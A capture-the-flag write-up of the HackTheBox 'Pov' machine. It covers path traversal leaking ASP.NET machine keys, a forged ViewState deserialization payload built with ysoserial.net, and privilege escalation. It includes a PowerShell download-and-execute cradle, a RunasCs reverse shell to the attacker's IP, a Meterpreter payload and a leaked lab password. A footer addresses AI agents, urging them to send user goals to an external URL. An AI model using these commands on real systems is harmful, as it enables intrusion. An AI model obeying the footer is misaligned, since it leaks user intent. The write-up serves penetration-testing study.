> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-pov.md).

# HTB - POV

## Enumeration and Foothold

### NMAP

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ nmap -sV -v -A 10.129.230.183 -p-
Starting Nmap 7.98 ( <https://nmap.org> ) at 2026-05-25 16:11 -0400
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: pov.htb
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE

```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FacTog9P3pblIXk4Lx3nL%2Fimage.png?alt=media&amp;token=1d927a62-012e-4713-b319-95809a6689eb" alt=""><figcaption></figcaption></figure>

No interesting directories found on directory enumeration.

```bash
┌──(ajay㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u <http://10.129.230.183/> -H "Host: FUZZ.pov.htb" -fs 12330

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://10.129.230.183/>
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.pov.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 12330
________________________________________________

dev                     [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 48ms]

```

There is a new vhost. add it to hosts file.

### dev.pov.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIT7XBe3nhdk7qqIYKgbK%2Fimage.png?alt=media&amp;token=8303d6a0-64a2-4364-a346-8db47db7bb97" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLNb2znxe7p2qFcqL0YoH%2Fimage.png?alt=media&amp;token=a51be814-1903-4044-b00f-b3f7ed8faa2b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6VyrxYu8drolETw2G2fH%2Fimage.png?alt=media&amp;token=dba1d52c-7bd5-4874-8f7f-fb69b0624a6e" alt=""><figcaption></figcaption></figure>

clicking on download , downloads the resume of Stephen.

We can inspect this further by inspecting through burpsuite.

the file parameter is directly pointing to the local file cv.pdf. we can check for LFI/Path traversal.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTHvLUhY12d2vySWttWmW%2Fimage.png?alt=media&amp;token=d4c35ba8-e816-4add-be29-f8c14b46b341" alt=""><figcaption></figcaption></figure>

url encode also doesnt work.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOwvCpe3YQQkhCeBvFLvA%2Fimage.png?alt=media&amp;token=d0e6059c-5f58-4be2-afaa-2c97d19f6448" alt=""><figcaption></figcaption></figure>

But absolute paths work.

Reading the web config file results in the decrytion key and validation key.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmB8PMqfleicxGPWsXM3M%2Fimage.png?alt=media&amp;token=168d9451-94f3-44db-b227-09423653cf2c" alt=""><figcaption></figcaption></figure>

```bash
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```

### ASPNET Viewstate Deserialization

[ASP.NET](http://ASP.NET) uses the `__VIEWSTATE` parameter to pass data back and forth between the client and the server. To ensure the client doesn't tamper with it, the server signs and encrypts the ViewState using the keys defined in the `<machineKey>` block.

Because we have leaked those exact keys, we can forge our own malicious, serialized `__VIEWSTATE` payload. When the server tries to unpack and validate our forged ViewState using its keys, it will deserialize our payload, triggering an **Object Deserialization Vulnerability** and executing your code.

To craft the exploit, need to use [**ysoserial.net**](http://ysoserial.net) (the premier tool for .NET deserialization payloads).

To run [ysoserial.net](http://ysoserial.net) on linux we need wine or mono.

i choose wine, we can install it through

```bash
# 1. Clear any stuck wine processes just in case
wineserver -k

# 2. Define a new, separate 32-bit prefix directory and set the architecture
export WINEPREFIX=~/.wine32_dotnet
export WINEARCH=win32

# 3. Boot up the new prefix (this initializes it as 32-bit)
winecfg

winetricks dotnet48

alias dotnetwine="WINEPREFIX=~/.wine32_dotnet WINEARCH=win32 wine"

# Launch the Windows Registry Editor inside your .NET prefix
dotnetwine regedit
```

now we can use wine to our [ysoserial.net](http://ysoserial.net/) tool.

```bash
──(ajay㉿kali)-[~/Tools/ysoserial]
└─$ wine ysoserial.exe -p ViewState -g TypeConfuseDelegate \
  -c "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('<http://10.10.15.201/Invoke-PowerShellTcp.ps1>')\"" \
  --path="/portfolio" \
  --apppath="/" \
  --validationalg="SHA1" \
  --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" \
  --decryptionalg="AES" \
  --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
pvTHzRYSA8YdPsu99h80ptashM7xobPw9fDpnWYDZNVCX5pzJ4PwazU2dFqBWcXYPo8%2F8526vxKxUdDZwxM5TYWREvaX5D19UvNgZ2jnASIl4xQGPZF961akl89e0WWvrEduEipS9oFrvAdEeGZMOJe6FTYtzUAcEd1hGrOfeXNz0M1URIxluUxgQv3B7Bl3KQkbWO7xRWCRhdu6vkqiawRSI27fnrb9z87aAY6r99
Sx1orltCyKJ5PhPN9GzoMyfkbFwtwRlUaekvQSgTX1zBgVVKJmDMozR0U9RM8fS4E%2BzkePBGI7zypdTKB7bCy5D4YIXlfLRHtDyAOiWqwHxKNQC2AlNaSE7rmjLlAd9%2FYnd%2BTVsMV5h3kBHgT8bPtfQibpipZqssjGckYraWtREMkwHb01ukKY8ljFr6edlMZyi6Ue6KHvJ6f1kXVprvoq3fj%2BZVUROwujaB
wmKJv2YEGcUoKLdotkdLAkKwou56WgVAtD3KQDMOn2VAc9KUh98E%2FEIy4afi7i7zccRu1SuNgeCWA0Wel0zhi5UH5o7Gy5mTaDbIwIns8vD0xy%2BBOT%2F0IBPdtaIUTBIeLSJrOKoZGfKjdjMp4S8VLptlHb%2BXxEg4rLsEu1o8%2BvlF6yhVkUpfO02SUllv2Ow6j6HeCkTHq7y7XwdFBvoeRt8%2BHnYFkyOF
gJWUlHLA8OqXfC1OtDSVjAraayiO4skboKbouGelhxGkVKT6N3mfZu%2BxytxbnnFcWcVVH6kl2EFIisiYp0S38N4HWVqn7b0pgBF8T4VBzTvwI2h89Zf7qvJdhfwYlO2JujeR%2B0MUdyAa9K98p9GgMODTt7P7YWJ4EOFvTvZ49xLbFQdN8JTXh6RdAKLVQls48d68nAb5PK1R%2BZ5c2VXoMKzVswv3EGvvAjrPvd
qzrn2tNP7Ab9Ee3DgAqZd3OKobnSRWuuFrZK5wzIoLabGlFPOhpWyz2mASuJ2kE9hwqYNJNE4bFOvOLE7%2BqS1mxHjYYJRtLcgQdwWmK9Qlts%2FKTSBaRIoRI9XuU5UDZr4MwzU4Hh0gq7edGwtyZqobzJ%2BLh2XXmA8CVqhO2Hm9%2BtCWFepJlBM8PZZQYF0xHtZnE%2FLnyLh%2FxvooR4IRz9E2gIHr3eRi3%
2FZlFGeventUcpuc6oFKrj3%2BUkzP7EIxlykdip1Bqk2s7YUzBw7uyLwx1DAcWqW%2FB7AK9044obng0ZZwX6V1dF6SfedlQOOtG0bU3xe1zJX85lZgEnd6diOUujDWpyTuvNCiqZ2w3J1b8jAn%2FVwd3itG2gNeCqVMBWO%2Fs2OAuy15CoHGe89KhoIoZoPfLyjRmg0ATgoadbH9NOgljE7xPpLpVlB5G24dQkRq
MOI5Qu%2F5ne27IFiqDY3tL02gE7OKP%2BYLYdrb2r0xqI0AVZ8Y1h9fYgSgde8PyaJe%2FwfI5AXyCuoLGRUW%2FG5aMQyaujxFpQwqTgaLNWtI6ZQW%2B4hzDcNxK0CfYHh%2FLRpGyiE69iQ4jv4TR0%2B94cna4%2FWth7W7BWJEHopJwtihX4b%2Bw37EEhPJ39JjFg%2FSGXhbmKcaxssqvgQAzXLTD8VSqXo9
YOQVlT9JXidGa2jt6iD%2F4l5WY5vTRSNyd%2FZJ%2FCaGQFmGop5UjCqi7enr2X3KcxlkQu7BFjHUN0YQlC6J8cdO26%2FvxUen5VbF3fzicu8hc9sBL6zmo26BK1XTe4%2BikGm3T404H1s7EGv1aNJ2IYeGhcxdjnfSiulUN1blFjHZ%2BkPbXCNWmHsp0ANFMj641L7czMB8pOIzmdP%2FuZCYC2cyzvBdHhm7BZ
qGU9toMlwIU8O3gK6wt2KEAQ3UWZ4%2BzULqRU1K1RTah%2FALQSyF3T%2BX6JwiuPMyxyfmA9Lyh%2BzccPZkpdeDuQayfszvtmNeem8Lty83NsIA7NIUEHfflNbKGzy6q5P378JvXFE%2BW38Plz5LhO1Dk4FIKMQbJwEycydYzkojPdXSF6VAubJr5H%2BcysbIixcgrDva7g6Nt0jq%2Fm%2FjMSChhsrH82JHUa
bEGbMHVKP4LFwLo2UfXQcKSNVrK0sHd3fOfg3OwNSjq%2BAeKORrpKFIaTvI7naTNLrTpnZtBbmgaVPGJCKDw0li7Pwj1G7uHF4wp7iM%2B%2FfxxfebsbY8Dndmy24Lwl8ZuU%2Fx2CAiFKEhK6YQNnOl5%2B1C3shGXRD3VU2ZXNV3QDZBBRcJ6UUemQ3XBGudt1pbLmLykrGxm15lDj0ajad78ekOCV%2BSu48%2F
GQV5efsSaojEd%2FjslfUFopdCVlfCl3e0sLJ7S13J%2F4Gv9qb%2FAH5Ok8qXG08Z8ELYJdf%2BCaD4r2ZzxSdPHLzULY7QnHInLLgvxbh5T4WzlB7UODqpYkIHk4TSrbKf%2BMoKSbVp6IkewmlseRwa0xNu8jJezibGzXh%2B60o3ueOErVBr3RwC4%2FAzFLxd31dbbLuhzJTgf8pmRIwudWZA5sgsirM6nmlAfT
sVf2TG9cGiLFoivDaKDwJHSCWQ3cWb0e7hUBBSXVswKuq4Mmdy38Ue6ze9UMKQHP3W0VJ9eyBfS9JLXb1z9O%2BIcEGmZhsrHOkaZzpeQcpFiwWGmQaKRMnqnuHfg8cEIE5aKeWBe7uLDLqXkVkiokwPN%2FgUiLQshON7HZYNq7RxaphtM9OhNS%2Fl5YzeQPEKhhmm%2BPrY30zMHtUoU%2BrAY%2B22sc84AmAx3Y
mkmflMDpsdxFBkcuc1T%2B9rDh5yJljHJ8ZSEPr5pPpbvID0wG3cxbiZGmOghGEruxCdnP2Z6%2FF7AyEhzpOpNGvztpQuTe6ngXL%2Fsk%2BoWRceCZnD8XChDS51nz7UFGi8vt5yeAeDq0SuzHIrB6hWD7cC8aAMZfBLJKomZIVat8ueomFF%2BiUWlO5NIk6ZTatzGcOggCVrOI9UjfLBZjjM7RAS8IHVA4kf8Hzo
5JlcCPyLGGBreKZ63KPxppS0AEsAAFCg1TTinKFvtANt3kQZIQiyKiWwEyaB%2Fidw4kDhAcbj29lcvY3tIec7ITgQf9%2BpusHmRFlMsK%2B34jir%2FKb7%2FHiOzvk2MBIxo8BFo7kfgau1OOYGk7vnQrPHphwBmKPDdg7UKA6hkUL7xlJE5jPaNSZ6Wc9kDocuk75uiO7ylHHfNJm%2FvgCjtOqVX6%2FiwjM2E2
m5DcuDM0snw179RrVC8ntjoBnCayEmvl9b9m5vXPLthmIi4d2KnDaSZjlJqeVM17GA%3D%3D
```

Hosted the powershell script in my downloads directory

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLgpaqsORViUFu8nelyrI%2Fimage.png?alt=media&amp;token=23abe00d-16ea-47c2-bcac-35e8529f8a3c" alt=""><figcaption></figcaption></figure>

now copy and paste the entire payload generated by ysoserial into the ViewState Parameter and click send.&#x20;

Make sure your nc listener is running.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLJGvLwZnyHnCx9fuwSm7%2Fimage.png?alt=media&amp;token=0cdf326c-5b76-4a1f-8952-023c5871fe68" alt=""><figcaption></figcaption></figure>

## Shell as sfitz

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs1jLzJdNJN1C1UNxI3EM%2Fimage.png?alt=media&amp;token=617c254e-bea3-4507-b825-48472e0661ff" alt=""><figcaption></figcaption></figure>

Found a connection.xml file in the Documents directory

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxQcsQzJ4JYDJxG2DgqX7%2Fimage.png?alt=media&amp;token=cab62295-7450-4169-b4fd-05a9d890dd12" alt=""><figcaption></figcaption></figure>

password for alaading user but the password is encrypted by DPAPI.

### Decrypting DPAPI

```bash
# 1. Import the XML file back into a PowerShell credential object
$cred = Import-Clixml -Path "C:\Users\sfitz\Documents\connection.xml"

# 2. Extract the NetworkCredential container and look at the unencrypted password string
$cred.GetNetworkCredential().Password
f8gQ8fynP44ek1m3
PS C:\Users\sfitz\Documents>
```

`alaading : f8gQ8fynP44ek1m3`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Foe9il16NeqSU1OJ8lgl3%2Fimage.png?alt=media&amp;token=c83d728b-2311-4454-bed1-96281c64e416" alt=""><figcaption></figcaption></figure>

alaading is part of Remote management groups so we can use winrm to login but winrm port is not open so we cannot.

To get a shell as alaading i will runascs

for which i will go to a writable directory and download runascs

### Runascs to get shell

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPb1Lj0EYnNLNQDf4A0Zn%2Fimage.png?alt=media&amp;token=2302e442-81f9-456b-b4eb-b47ed8e90d54" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FB6SDZgkdstW9b7ayZXAM%2Fimage.png?alt=media&amp;token=d0797439-ff27-4b19-aa32-29c065a2b7ed" alt=""><figcaption></figcaption></figure>

compile the file

```bash
PS C:\Windows\Tasks> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
Microsoft (R) Visual C# Compiler version 4.7.3190.0

for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see <http://go.microsoft.com/fwlink/?LinkID=533240>

PS C:\Windows\Tasks> dir

    Directory: C:\Windows\Tasks

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        5/25/2026  10:04 PM          94880 RunasCs.cs                                                            
-a----        5/25/2026  10:05 PM          51712 RunasCs.exe
```

```bash
PS C:\Windows\Tasks> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.15.201:5555         

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-7e4e9$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2684 created in background.
PS C:\Windows\Tasks>
```

## Shell as Alaading

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FynR6lJ5xaPKnS64YD7Yq%2Fimage.png?alt=media&amp;token=923225ea-6764-4834-941a-807efc4cd96d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgwlh5WHYAZOWCZLxJcXQ%2Fimage.png?alt=media&amp;token=426ed088-b316-4126-ba5a-76c55c9ec70e" alt=""><figcaption></figcaption></figure>

SeDebugPrivilge is there but disabled but it was enabled on cmd.

### Exploiting SeDebugPrivilege

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGt0s5GhjkcatEbWHydtu%2Fimage.png?alt=media&amp;token=adaf26c1-e79d-4051-a9b0-9a6607b21a96" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBjQihBLV0QTgE2cMkDXK%2Fimage.png?alt=media&amp;token=ad1ba622-5a2d-46e0-b72f-8ec7ca7dd376" alt=""><figcaption></figcaption></figure>

`set PAYLOAD windows/x64/meterpreter/reverse_tcp`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhOYJ2JgyZf3b0TRubkwj%2Fimage.png?alt=media&amp;token=ffa82457-49d6-48bc-b009-91f61e7c2e4d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZv0ynmXrNP4Umo0wRRKH%2Fimage.png?alt=media&amp;token=4c66eef5-3b1d-4070-9ed4-21b5b32b1602" alt=""><figcaption></figcaption></figure>

We need a service that is run by SYSTEM and we need to migrate to it.

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Faz38RdqzYRCx7rV9YpKN%2Fimage.png?alt=media&amp;token=7b8fe7b4-5f71-4c83-8270-24163eb73bec" alt=""><figcaption></figcaption></figure>

### Intended way of getting shell

`Using psgetsys.ps1` explained by 0xdf&#x20;

{% embed url="<https://0xdf.gitlab.io/2024/06/08/htb-pov.html#shell-as-administrator>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-pov.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
